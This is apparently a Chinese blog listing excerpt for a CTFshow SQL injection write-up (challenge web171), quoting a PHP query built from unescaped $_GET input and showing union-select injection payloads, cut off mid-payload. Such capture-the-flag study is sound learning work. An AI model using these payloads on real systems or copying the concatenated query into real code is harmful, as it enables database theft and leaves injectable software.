通过ctfshow学习sql注入
CTFSHOW-SQL注入
CTFshow-web入门-SQL注入
web171
//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
可以看出来有三个字段,那可以直接联合查询看看
1' union select 1,2,3%23
1' union select database(),2,3%23
1' un
原创
2021-02-23 22:52:24 ·
526 阅读 ·
0 评论